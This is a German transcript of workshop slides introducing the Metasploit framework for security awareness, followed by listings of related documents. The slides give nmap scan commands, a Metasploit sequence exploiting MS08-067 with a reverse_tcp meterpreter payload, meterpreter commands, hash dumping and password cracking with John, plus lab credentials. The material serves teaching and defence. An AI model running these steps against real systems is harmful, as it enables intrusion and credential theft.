Willkommen zum Security Day 2012

Größe: px
Ab Seite anzeigen:

Download "Willkommen zum Security Day 2012"

Transkript

1 Willkommen zum Security Day 2012 Willkommen zum ITSeCX 2012 Workshop System Exploitation

2 Workshop Überblick Metasploit Framework kennenlernen Awareness und Wissen über moderne Angriffswerkzeuge schärfen hands-on Umgebung Backtrack 5 R1 User: root Password: toor Server-Victim User: Administrator Password: test und Client-Victim User: Administrator Password: admin Hilfestellungen Einzugebende Kommandos finden sich in den Slides Fragen Bitte jederzeit stellen! 2

3

4 Motivation für diesen Workshop Angriffswerkzeug Metasploit vorstellen um daraus Lessons Learned für die Defensive zu ziehen um zu sehen, wie einfach die Verwendung von Exploit Tools mittlerweile sein kann grundlegendes Handling des Werkzeugs vermitteln um sich eigenständig eingehender damit zu beschäftigen um Awareness schaffen zu können einfache Angriffsszenarien darstellen um besseres Verständnis dafür zu bekommen, was alles mit modernen Angriffswerkzeugen (auch automatisiert) möglich ist 3

5 Port- und Vulnerability Scanning Schwachstellen in Netzwerken und Systemen finden netzwerkseitige Vulnerability Scans lokale Vulnerability Scans Vulnerability Scanning Suche nach bekannten Sicherheitsproblemen und Schwachstellen Port Scanning Suche nach offenen, geschlossenen oder gefilterten Ports Operating System Detection Versuch, das Betriebssytem eines Zielsystem (netzwerkseitig) zu identifizieren Service/Version Detection Versuch, den Service/dessen Version an einem offenen Port festzustellen

6 NMAP: Network Mapper NMAP Buch als Standard-Referenz zu Port Scanning

7 NMAP: Network Mapper eines der wenigen real existierenden Tools aus Filmen Yes, even the Matrix runs OpenSSH!!!

8 TCP Port Scanning TCP 3-Way Handshake zum Verbindungsaufbau, TCP-Flags TCP Port offen HOST SYN SYN / ACK ACK SERVER TCP Port geschlossen SYN RST HOST SERVER

9 Scannen nach offenen Ports... nmap -ss -n --reason nmap -su -p n --reason

10 Erkennen des Betriebssystems nmap -O -n --reason nmap -O -n --reason

11 Erkennen der laufenden Services nmap -sv -n --reason

12 Erkennen von Schwachstellen auf laufenden Services nmap --script=exploit -n --reason

13 Exploits und andere Angriffswerkzeuge... zumindest theoretisch seit 1972 bekannt in Computer Security Technology Planning Study von James P. Anderson Problematik grundsätzlich beschrieben praktisch seit mind ein Begriff Morris Worm zur Abmessung der Größe des ARPAnet nutze unterschiedliche bekannte Schwachstellen aus sendmail, finger, rsh/rexec seither Exploit-Code laufend auf Mailing-Listen, Portalen u.ä veröffentlicht 12

14 Exploit Portale gestern heute morgen? bieten Exploits zum Download an Nmap Exploit World (geht zurück auf 1996) K-Otic / FrSirt Milw0rm (geht zurück auf 1998) aktuell: Großteil der Exploit-Portale in Exploit-Database archiviert (www.exploit-database.com) >> Exploit Database (http://www.exploit-db.com/) 13

15 Heute: Exploitation Frameworks Kommerzielle Werkzeuge (meist ab USD lizenzierbar) Immunitysec CANVAS Core Impact Pro Metasploit Pro / Express Open-Source oder freie Werkzeuge Metasploit Framework / Community Inguma winautopwn 14

16 Heute: Exploit Packs und Exploit Kits Exploit Packs enthalten neueste Exploits für populäre Schwachstellen kommerzielle Produkte Meist in Verbindung mit Exploitation Frameworks verwendbar VulnDisco Pack Professional D2 Exploitation Pack Exploit Kits Begriff wird für Tools zum Customizing von Malware verwendet enthalten meist auch Exploit-Sammlungen für neueste Schwachstellen underground ware 15

17 Immunitysec CANVAS verfügt dzt. über ca. 490Exploits monatlich ca. 4 Exploits hinzugefügt Fokus auf folgende Schwachstellen mit Möglichkeit zur Remote Exploitation in mainstream Software alle Plattformen und Applikationen Vorteile Exploits sind getestet bzw. Anpassung kann angefordert werden Support für Tester ist verfügbar graphische Interfaces leiten durch den Angriffsvorgang 16

18 Core Impact Professional verfügt über ca. 700 Exploits monatlich ca Exploits hinzugefügt Fokus auf folgende Schwachstellen mit Möglichkeit zur Remote Exploitation mit Möglichkeit zur Local Exploitation Schwachstellen in Webapplikationen etabliert eigene Methodologie RPT (Rapid Penetration Testing) Tester wird Schritt für Schritt durch den ganzen Vorgang angeleitet alles im graphischen Interface erledigbar Berichtsfunktionalitäten im Produkt inkludiert 17

19 Metasploit verfügt über ca. 758 Exploits Exploits sind Open-Source jeder kann Exploits mit Hilfe des Metasploit Frameworks entwickeln monatlich ca Exploits hinzugefügt user-contributed Code (bedenklich?) gratis oder im Rahmen von Bug Bounty Wettbewerben bereitgestellt in freien und kostenpflichtigen Editionen verfügbar Metasploit Framework ist gemeinsame Basis für alle Editionen 18

20 Metasploit Framework gemeinsame Basis für alle Editionen wesentlicher Nachteil keine webbasierte Oberfläche wie in Express / Community / Pro keine inkludierten Reporting-, Scheduling- oder Automatisierungsmöglichkeiten kein Support, daher auch keine Funktionsgarantien wesentlicher Vorteil tagesaktuell aus dem SVN mit Exploits und Angriffswerkzeugen aktualisierbar frei zugänglich und erweiterbar If it is in metasploit, you should patch it. 21

21 Metasploit Framework eine einfache Umgebung zum Entwickeln von Exploits Metasploit Framework bietet Basisstruktur auf vorhandener Funktionalität des Frameworks kann aufgebaut werden ein Testwerkzeug für unterschiedlichsten Einsatz Metasploit bis Version 2.x in Perl entwickelt, seit 3.x in Ruby 22

22 Metasploit Features Import von Ergebnissen anderer Tools NMAP, Nessus, Rapid7 Nexpose, WebInspect,... Session Management und Scripting Verbindungen zu kompromittierten Systemen werden aufrecht gehalten Automatisierung von Arbeitsschritten ist möglich IDS und Firewall Evasion Veränderung des Traffics zur Umgehung von Firewalls und IDS Pivoting (Tunneling in andere Netzwerke) Post-Exploitation Tools inkludiert nicht nur Angriff, sondern auch Weiterführung des Angriffs erfolgt direkt aus dem Framework 23

23 Metasploit Dokumentation Metasploit ist ein Community-Projekt Dokumentation kommt aus der Community WIKIBOOKS (http://en.wikibooks.org/wiki/metasploit/contents) (http://www.offensive-security.com/metasploit- Metasploit Unleashed unleashed/) 25

24 Metasploit Dokumentation Metasploit ist ein Community-Projekt Dokumentation kommt aus der Community Security Tube Metasploit Megaprimer (http://www.securitytube.net/groups? operation=view&groupid=8) über 5 Stunden Videos zu Verwendung von Metasploit div. Bücher, Magazine, Präsentationen, 26

25 Metasploit Kurse einen echten Metasploit Kurs gibt es nicht das Framework verändert sich laufend mit jedem SVN Checkout kann eine neue Funktion hinzukommen div. sehr gute Online-Kurse beschäftigen sich mit Metasploit sehr intensiv Offensive Security: Penetration Testing with Backtrack 27

26 Aufbau des Metasploit Frameworks Metasploit ist eine Sammlung von Ruby-Bibliotheken div. Tools zur Entwicklung von Exploits Metasploit Dokumentation FRAMEWORK Documentation User Interfaces Modules Exploit Creation Misc. 28

27 Aufbau des Metasploit Frameworks Module stellen die eigentliche Funktionalität des Frameworks MODULES Encoders Exploits Payloads Auxiliary Post 29

28 Which interface to rule them all? msfd Metasploit Framework Daemon Daemon auf Port konzipiert für Zugriff durch mehrere Benutzer entspricht für einzelne Benutzer msfconsole msfcli Metaspoit Framework Command Line Kommandos müssen in einzelner Zeile übergeben werden hauptsächlich für Scripting interessant 30

29 Which interface to rule them all? msfgui Metasploit Framework GUI java-basiertes Interface, kurzzeitig nicht weiterentwickelt worden msfconsole Metasploit Framework Console Command-Line Shell zur Steuerung des Frameworks wahrscheinlich das wichtigste / bevorzugteste Interface für MSF 31

30 Which interface to rule them all? Armitage neuestes GUI für Metasploit sehr einfache Benutzerführung laufend weiterentwickelt Verwendung auch in Teams möglich jeder hat eigenes GUI alle arbeiten auf derselben Metasploit Instanz für Präsentationen zur Awareness- Schaffung sehr gut geeignet! 32

31 cd /pentest/exploits/framework./msfconsole 33

32 help search show info use Befehlsübersicht Module suchen Module anzeigen Modulinformationen anzeigen Modul anwenden 34

33 Mom, where do the exploits come from? stable versions von Metasploit in regelmäßigen Release-Zyklen üblicherweise wird testing branch direkt aus SVN bezogen neueste Exploits neueste Payloads neueste Bugfixes aber: Testing, keine stabile Version (stabile Versionen für Security-Tools?) 1-2 Updates pro Tag machen durchaus Sinn auf jeden Fall immer mit der aktuellsten Revision des Frameworks arbeiten 35

34 Metasploit Modules Exploits Exploit-Module zur Ausnutzung von Schwachstellen müssen mit Payloads kombiniert werden, um sinnvolle Aktionen ausführen zu können unterschiedliche Arten von Exploits Remote Exploits zum Angriff von (Server-)dienste über Netzwerke Local Exploits zur Ausführung von Attacken lokal auf Systemen (zb.: Privilege Escalation) Client-Side Exploits zum Angriff von Clients über Netzwerke (zb.: über Browser) Document Format Exploits zur Erstellung von Dateien (PDF, AVI, MP3,...), welche Schadcode enthalten und Schwachstellen in Programmen ausnutzen 36

35 Metasploit Modules Exploits Unterstützte Plattformen Windows Linux Unix (IRIX, Solaris, AIX, HPUX) OSX Client-side exploits Internet Explorer/Firefox DLL-Hijacking Real Player Document format exploits PDF MS Office Quicktime 37

36 Metasploit Modules Payloads führen Aktionen nach dem Ausnutzen der Schwachstelle aus verschaffen in der Regel dem Angreifer Zugriff auf das System öffnen Listener Ports, auf die Angreifer verbindet (bind_tcp) verbinden sich zum Angreifer zurück (reverse_tcp) tunneln Netzwerkverkehr um Firewalls oder Proxies zu umgehen reverse_http(s) reverse_tcp_dns ermöglichen die Interaktion mit dem Zielsystem über einfache Shells über graphische Oberflächen (VNC) über meterpreter eine spezialisierte Shell, welche weite Teile des Metasploit Frameworks auf das Zielsystem transferiert 39

37 Metasploit Modules Single Payloads in sich abgeschlossene Payloads adduser Adds a user to local admins group (download_)exec (Downloads and) runs a command on the target machine shell_bind_tcp(_xpfw) Provides cmd.exe access via a port listener (after disabling the Windows Firewall) shell_reverse_tcp Makes a connection back to the attacker to provide shell access 40

38 Metasploit Modules Post zur Ausführung von Post Exploitation Angriffen diverse Möglichkeiten bringt das Framework mit Dumpen von Hashes Dumpen von gespeicherten Passwörtern in Applikationen (Browser, 3rd Party Software,...) anlegen von neuen Benutzern Pivoting : Tunneling über den kompromittierten Host in weitere Netzwerke gibt es kein Post Module, bleibt... Scripting in Meterpreter (Ruby) Railgun (direktes Ansprechen der Windows API) 41

39 use exploit/windows/smb/ms08_067_netapi info show show options set RHOST set PAYLOAD windows/meterpreter/reverse_tcp show options set LHOST exploit 43

40 show targets set TARGET 13 exploit 46

41 So it did not work? Functional Exploit Exploit muss getestet sein, um in verschiedenen Environments verlässlich zu funktioneren Hardening Options Betriebssysteme bieten Schutz vor manchen Exploit-Techniken DEP (Data Execution Prevention) ASLR (Address Space Layout Randomization) SEHOP (Structured Exception Handler Protection) Compiler kennen auch Schutzmechanismen ( Stack Cookies ) Betriebssystemversionen (Kernel-Version, Patch-Stand) unterschiedlich kompilierte Binaries zb.: beim Einsatz unterschiedlicher Sprachversionen ( Canaries ) 45

42 Metasploit Meterpreter spezialisierte Shell für Angriffe DLLs werden in kompromittierten Prozess injiziert kein eigener Prozess auf Ziel erkennbar EXPLOIT TARGET Exploited Process daher nicht so einfach zu finden funktioniert nur auf Windows Systemen ATTACKER Meterpreter DLL 47

43 Metasploit Meterpreter Basic commands? / help exit / quit sysinfo : Shows name and OS type of target machine shutdown / reboot reg : Allows reading / writing to the registry of the target machine 48

44 Metasploit Meterpreter Filesystem commands cd : navigate on target machine lcd : navigate on local (attackers) machine pwd / getwd : Shows current directory ls, cat, mkdir, rmdir : All familiar unix style commands download / upload : Move files between local and target machines edit : vi style editor 49

45 Metasploit Meterpreter Metasploit Meterpreter getpid : shows the process ID that meterpreter is running within getuid : shows the user ID that meterpreter is running as ps : Shows active processes kill : kills a process execute : executes a program on the target machine migrate : move meterpreter into the memory of another process Cannot jump to higher priv process Can be useful if you exploit an unstable process 50

46 Metasploit Meterpreter Network Commands ipconfig : shows the interface information portfwd : Sets a local port listener to forward packets through the meterpreter process to other target machines on the target LAN route : displays the targets routing table (add/del/subnet/netmask and gateway options can alter the targets routing table. 51

47 Metasploit Meterpreter help sysinfo screenshot 52

48 Metasploit Meterpreter Scripts erweitern die Funktionalität von Post Modulen können zur Automatisierung von Post-Exploitation verwendet werden run <TAB><TAB> 53

49 Metasploit Meterpreter hashdump (OUTPUT in File hashes.txt schreiben) cd /pentest/password/john john /root/hashes.txt 54

vii Inhaltsverzeichnis 1 Einleitung 1

vii Inhaltsverzeichnis 1 Einleitung 1 vii 1 Einleitung 1 1.1 Was ist das Metasploit-Framework?............................. 2 1.2 Ziel des Buches............................................. 2 1.3 Wer sollte dieses Buch lesen?...................................

Mehr

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks 543 Dieses Kapitel stellt eine Zusammenfassung der häufigsten Tätigkeiten und verwendeten Befehle in Kurzform dar. Diese Darstellung ist nicht vollständig und soll Ihnen in erster Linie wichtige Anhaltspunkte

Mehr

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools jochen.schlichting@secorvo.de Seite 1 Inhalt Einführung: Typische Angriffe

Mehr

German Metasploit Framework Tutorial 16. August 2005 dav

German Metasploit Framework Tutorial 16. August 2005 dav German Metasploit Framework Tutorial 16. August 2005 dav Inhalt 1. Einleitung 2. Exploit Datenbank 2.1. Neue Exploits integrieren 3. Payload Datenbank 4. Konfiguration und Anwendungen eines Exploits 4.1.

Mehr

Metasploit Framework Unleashed beyond Metasploit

Metasploit Framework Unleashed beyond Metasploit Metasploit Framework Unleashed beyond Metasploit

Mehr

Penetration Testing mit MetaSploit

Penetration Testing mit MetaSploit Penetration Testing mit MetaSploit Stefan Schumacher www.sicherheitsforschung-magdeburg.de Chemnitzer Linux-Tage 2012 Über Mich Direktor des Magdeburger Instituts für Sicherheitsforschung Forschungsprogramme

Mehr

MySQL Queries on "Nmap Results"

MySQL Queries on Nmap Results MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar

Mehr

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp.

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp. Germany 2008 Conference http://www.owasp.org/index.php/germany WMAP Metasploit 3.2 Module für Pentester von Webapplikationen Frankfurt, 25.11.08 Hans-Martin Münch it.sec GmbH & Co KG mmuench@it-sec.de

Mehr

Reale Angriffsszenarien - Überblick

Reale Angriffsszenarien - Überblick IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien - Überblick kai.jendrian@secorvo.de Security Consulting GmbH, Karlsruhe Seite 1 Inhalt Praxisprobleme Aktuelle Angriffsmethoden

Mehr

Command-Line. Line-Tools und Unix-Umgebungen Umgebungen unter Windows

Command-Line. Line-Tools und Unix-Umgebungen Umgebungen unter Windows Command-Line Line-Tools und Unix-Umgebungen Umgebungen unter Windows Wie mache ich dem Unix- Sysadmin das Leben einfacher im Umgang mit Windows-Rechnern? Jochen Felten 19.1.2002 Inhalt I.CMD-Tools von

Mehr

German English Firmware translation for T-Sinus 154 Access Point

German English Firmware translation for T-Sinus 154 Access Point German English Firmware translation for T-Sinus 154 Access Point Konfigurationsprogramm Configuration program (english translation italic type) Dieses Programm ermöglicht Ihnen Einstellungen in Ihrem Wireless

Mehr

Ralf M. Schnell. Technical Evangelist Microsoft Deutschland GmbH

Ralf M. Schnell. Technical Evangelist Microsoft Deutschland GmbH Ralf M. Schnell Technical Evangelist Microsoft Deutschland GmbH Was ist Server Core? Warum Server Core? Was kann man damit machen? Was kann man damit nicht machen? Server Core: Installation Server Core:

Mehr

Agieren statt Reagieren - Cybercrime Attacken und die Auswirkungen auf aktuelle IT-Anforderungen. Rafael Cwieluch 16. Juli 2014 @ Starnberger it-tag

Agieren statt Reagieren - Cybercrime Attacken und die Auswirkungen auf aktuelle IT-Anforderungen. Rafael Cwieluch 16. Juli 2014 @ Starnberger it-tag Agieren statt Reagieren - Cybercrime Attacken und die Auswirkungen auf aktuelle IT-Anforderungen Rafael Cwieluch 16. Juli 2014 @ Starnberger it-tag Aktuelle Herausforderungen Mehr Anwendungen 2 2014, Palo

Mehr

Penetrationstests mit Metasploit

Penetrationstests mit Metasploit Michael Kohl Linuxwochenende 2011 24 September 2011 Outline 1 Einleitung 2 Penetration Testing 3 Metasploit 4 Demo 5 Ressourcen Über mich Früher: Linux/Unix Admin / Systems Engineer Jetzt: Rails-Entwickler,

Mehr

Michael Messner www.dpunkt.de/plus

Michael Messner www.dpunkt.de/plus Michael Messner arbeitet als IT Security Consultant bei der Corporate Technology der Siemens AG in München und führt dort technische Sicherheitsanalysen und Penetrationstests durch. Neben der technischen

Mehr

6.6 Erweiterte Metasploit-Resource-Skripte

6.6 Erweiterte Metasploit-Resource-Skripte 264 6 Automatisierungsmechanismen und Integration von 3rd-Party-Scannern durch die vorhandene Benutzerinteraktion häufig essenziell, eine möglichst schnelle und sichere Prozessmigration durchzuführen.

Mehr

EEX Kundeninformation 2007-09-05

EEX Kundeninformation 2007-09-05 EEX Eurex Release 10.0: Dokumentation Windows Server 2003 auf Workstations; Windows Server 2003 Service Pack 2: Information bezüglich Support Sehr geehrte Handelsteilnehmer, Im Rahmen von Eurex Release

Mehr

Netzwerkorientierte Anwendungssicherheit

Netzwerkorientierte Anwendungssicherheit Netzwerkorientierte Anwendungssicherheit Möglichkeiten der Korrelation von Schwachstelleninformationen von Vulnerability Scannern mit Exploit- und Schwachstellendatenbanken Betreuer: Helmut Kaufmann, Bernhard

Mehr

Backtrack 5. Effektive Sicherheitstests selbst durchführen. Autor: Martin Schagerl. Letzte Änderung am 17.07.2012. Version 1.2

Backtrack 5. Effektive Sicherheitstests selbst durchführen. Autor: Martin Schagerl. Letzte Änderung am 17.07.2012. Version 1.2 Effektive Sicherheitstests selbst durchführen Autor: Martin Schagerl Letzte Änderung am 17.07.2012 Version 1.2 Lexon e.u., Inh. Martin Schagerl, Holzing 52, A 3252 Bergland T: +43 / 676 / 7119622, E: office@lexon.at,

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings ANGRIFF MICHAEL MESSNER Metasploit Fixing the framework Schwierigkeitsgrad: Die praktische Anwendung des Metasploit Exploiting Frameworks bietet enorme Möglichkeiten zur Vereinfachung eines Pentests. Dazu

Mehr

Availability Manager Overview

Availability Manager Overview DECUS Symposium 2007 Availability Manager Overview Günter Kriebel Senior Consultant OpenVMS guenter.kriebel@hp.com GET CONNECTED People. Training. Technology. 2006 Hewlett-Packard Development Company,

Mehr

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 ÜBER MICH 34 Jahre, verheiratet Open Source Enthusiast seit 1997 Beruflich seit 2001 Sicherheit,

Mehr

Sinn und Unsinn von Desktop-Firewalls

Sinn und Unsinn von Desktop-Firewalls CLT 2005 Sinn und Unsinn von Desktop-Firewalls Wilhelm Dolle, Director Information Technology interactive Systems GmbH 5. und 6. März 2005 1 Agenda Was ist eine (Desktop-)Firewall? Netzwerk Grundlagen

Mehr

ANGRIFF. Metasploit. Exploiting Framework the basics

ANGRIFF. Metasploit. Exploiting Framework the basics ANGRIFF MICHAEL MESSNER Metasploit Exploiting Framework the basics Schwierigkeitsgrad: Vor allem im professionellen Pentesting Umfeld nehmen Exploiting Frameworks mittlerweile eine nicht mehr wegzudenkende

Mehr

Einleitung Sniffing, Analyzing, Scanning Scanning. Netzwerke. Bierfert, Feresst, Günther, Schuster. 21. März 2006

Einleitung Sniffing, Analyzing, Scanning Scanning. Netzwerke. Bierfert, Feresst, Günther, Schuster. 21. März 2006 Sniffing, Analyzing, 21. März 2006 Sniffing, Analyzing, Sniffing, Analyzing, Transmission Control Protocol (RFC 793) Zwei Endpunkte, bezeichnet mit Server und Client Server und Client aus je einem geordneten

Mehr

Effizienz im Vor-Ort-Service

Effizienz im Vor-Ort-Service Installation: Anleitung SatWork Integrierte Auftragsabwicklung & -Disposition Februar 2012 Disposition & Auftragsabwicklung Effizienz im Vor-Ort-Service Disclaimer Vertraulichkeit Der Inhalt dieses Dokuments

Mehr

Hackerpraktikum SS 202

Hackerpraktikum SS 202 Hackerpraktikum SS 202 Philipp Schwarte, Lars Fischer Universität Siegen April 17, 2012 Philipp Schwarte, Lars Fischer 1/18 Organisation wöchentliche Übung mit Vorlesungsanteil alle zwei Wochen neue Aufgaben

Mehr

Advanced Persistent Threat

Advanced Persistent Threat Advanced Persistent Threat Ivan Bütler Compass Security AG, Schweiz Ivan.buetler@csnc.ch Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel.+41 55-214 41 60 Fax+41 55-214 41 61

Mehr

Marketing Update. Enabler / ENABLER aqua / Maestro II

Marketing Update. Enabler / ENABLER aqua / Maestro II Marketing Update Enabler / ENABLER aqua / Maestro II Quartal 01/2013 1 Kommentar des Herausgebers Liebe Kunden und Partner, dieser Marketing Update gibt Ihnen einen kurzen Überblick über die aktuell verfügbaren

Mehr

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation

Departement Wirtschaft. IT Forensics in action against malicious Software of the newest generation Departement Wirtschaft IT Forensics in action against malicious Software of the newest generation Dipl. Ing. Uwe Irmer IT Security- Schnappschüsse 2 Malware der neuesten Generation Professionalität- wer

Mehr

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165 Linux basierendes NAS auf Seagate Goflex Net installieren Christian Eppler 21162, Stefan Möbius 21165 Inhaltsverzeichnis Wieso das Ganze? Nachteile Pogoplug/Debian Vorteile Pogoplug/Debian Wieso diese

Mehr

Titelbild1 ANSYS. Customer Portal LogIn

Titelbild1 ANSYS. Customer Portal LogIn Titelbild1 ANSYS Customer Portal LogIn 1 Neuanmeldung Neuanmeldung: Bitte Not yet a member anklicken Adressen-Check Adressdaten eintragen Customer No. ist hier bereits erforderlich HERE - Button Hier nochmal

Mehr

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko?

Cnlab / CSI 2011. Demo Smart-Phone: Ein tragbares Risiko? Cnlab / CSI 2011 Demo Smart-Phone: Ein tragbares Risiko? Agenda Demo 45 Schutz der Smart-Phones: - Angriffsszenarien - «Jailbreak» - Was nützt die PIN? - Demo: Zugriff auf Passwörter iphone Bekannte Schwachstellen

Mehr

Call Monitor und TAPI mit Outlook & Exchange Integration an Cisco UC540W

Call Monitor und TAPI mit Outlook & Exchange Integration an Cisco UC540W Call Monitor und TAPI mit Outlook & Exchange Metacarp GmbH Geschäftsführer: Alexander Cimen Unter den Eichen 5 (Haus i) 65195 Wiesbaden T: +49 (0) 611 53 1777 55 F: +49 (0) 611 53 1777 51 E: info@metacarp.de

Mehr

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH 2 Open for Business - Open to Attack? 75% aller Angriffe zielen auf Webanwendungen (Gartner, ISS)

Mehr

http://www.stud.uni-potsdam.de/~hoeffi/gdb.html#wozu

http://www.stud.uni-potsdam.de/~hoeffi/gdb.html#wozu gdb: debugging code In der Vorlesung hatte ich Teile von http://www.stud.uni-potsdam.de/~hoeffi/gdb.html#wozu und ein eigenes Beispiel diskutiert. Ein Debugger soll helfen Fehler im Programm, die sich

Mehr

Scannen des gesamten IPv4 WWW

Scannen des gesamten IPv4 WWW Scannen des gesamten IPv4 WWW Prof. Dr.-Ing. Sebastian Schinzel Email: Web: Twitter: schinzel@fh-muenster.de https://www.its.fh-muenster.de/ @seecurity (c) Prof. Sebastian Schinzel 1 Sebastian Schinzel

Mehr

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 1 Telnet und FTP

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 1 Telnet und FTP VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer Kommunikation I (Internet) Übung 1 Telnet und FTP SS 2003 Inhaltsverzeichnis 2. Übungen mit Telnet und FTP...1 2.1. Testen der Verbindung mit ping...1 2.2. Arbeiten

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit.

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit. 1. ODBC 1.1 Problemstellung Die Informationen über die Microsoft SQL Server Datenbanken sind zur Zeit nicht auf der TIMD Website verfügbar. Der Grund ist, dass kein Interface zur Abfrage der benötigten

Mehr

Metasploit 2 the max

Metasploit 2 the max ANGRIFF MICHAEL MESSNER Metasploit 2 the max Schwierigkeitsgrad: Folgendes Szenario: Sie kommen zu einem Auftraggeber, um einen internen Penetrationstest durchzuführen. Nachdem Sie ihre Pentesting Frameworks

Mehr

Mac OS X Consoliero: Terminal Solutions Version 1.0

Mac OS X Consoliero: Terminal Solutions Version 1.0 Mac OSX Consoliero Terminal Solution Seite: 1/11 Mac OS X Consoliero Weiterführende Dokumentationen für Administratoren. Mac OS X Consoliero: Terminal Solutions Version 1.0 Christoph Müller, PTS Mac OSX

Mehr

OpenWAF Web Application Firewall

OpenWAF Web Application Firewall OpenWAF Web Application Firewall Websecurity und OpenWAF in 60 Minuten Helmut Kreft Fuwa, 15.11.2010 Agenda Webapplikationen? Furcht und Schrecken! OWASP Top 10 - Theorie und Praxis mit dem BadStore Umgang

Mehr

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Konzept eines Datenbankprototypen 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Inhalt (1) Projektvorstellung & Projektzeitplan Softwarekomponenten Detailierte Beschreibung der System Bausteine

Mehr

Praktikum IT- Sicherheit

Praktikum IT- Sicherheit Praktikum IT- Sicherheit - Versuchshandbuch - Durchführung Honeypot Ein Honeypot stellt ein System dar, um Angriffe, das Verhalten von Malware und weitere Angriffsaktivitäten aufzuzeichnen zu können. Die

Mehr

SP Web Applica on Intranet - Docusnap.intern

SP Web Applica on Intranet - Docusnap.intern Date Author 11.10.2012 Docusnap Number of Pages 5 Applica on Pool Applica on Pool Security Account Accept Username and Password Enable Addi onal Ac ons and Online Status Alerts Enabled Allow Access to

Mehr

AnyWeb AG 2008 www.anyweb.ch

AnyWeb AG 2008 www.anyweb.ch OMW 8.1- What s new System- Applikations- und Servicemanagement Agenda Was ist OMW HTTPS Agent Remote Agent Installation User Role Based Service View Custom Message Attributes Maintenace Mode Weitere Erweiterungen

Mehr

Vulnerability Scanning + Penetration Testing

Vulnerability Scanning + Penetration Testing Vulnerability Scanning + Penetration Testing Seminar IT-Sicherheit Felix Riemann felixriemann@student.uni-kassel.de 29. Januar 2011 Gliederung Vulnerability Scanning Was ist das? Scanner Demo: Nessus Penetration

Mehr

MySQL 101 Wie man einen MySQL-Server am besten absichert

MySQL 101 Wie man einen MySQL-Server am besten absichert MySQL 101 Wie man einen MySQL-Server am besten absichert Simon Bailey simon.bailey@uibk.ac.at Version 1.1 23. Februar 2003 Change History 21. Jänner 2003: Version 1.0 23. Februar 2002: Version 1.1 Diverse

Mehr

MSDN Webcast: Team Foundation Server Mehr als nur eine Versionsverwaltung! Visual Studio Team System (Teil 1 von 10) Veröffentlicht: 20.

MSDN Webcast: Team Foundation Server Mehr als nur eine Versionsverwaltung! Visual Studio Team System (Teil 1 von 10) Veröffentlicht: 20. MSDN Webcast: Team Foundation Server Mehr als nur eine Versionsverwaltung! Visual Studio Team System (Teil 1 von 10) Veröffentlicht: 20. Februar 2008 Presenter: Neno Loje, MVP für Team System www.teamsystempro.de

Mehr

SNMP Kommandos für Alcatel-Lucent OmniSwitch Produkte

SNMP Kommandos für Alcatel-Lucent OmniSwitch Produkte 802.1x / MAC Address Authentication Abfragen der Port-Mobility Tabelle snmpwalk -v 2c -c public 192.168.10.1 1.3.6.1.4.1.6486.800.1.2.1.4.1.1.2.1 Abfragen des Mobility Settings für einen Port (in diesem

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung } Warum ist Sicherheit ein Software Thema? } Sicherheit in heutigen Softwareprodukten & Trends } OWASP Top 10 Kategorien Hacking Demo } SQL Injection: der Weg zu

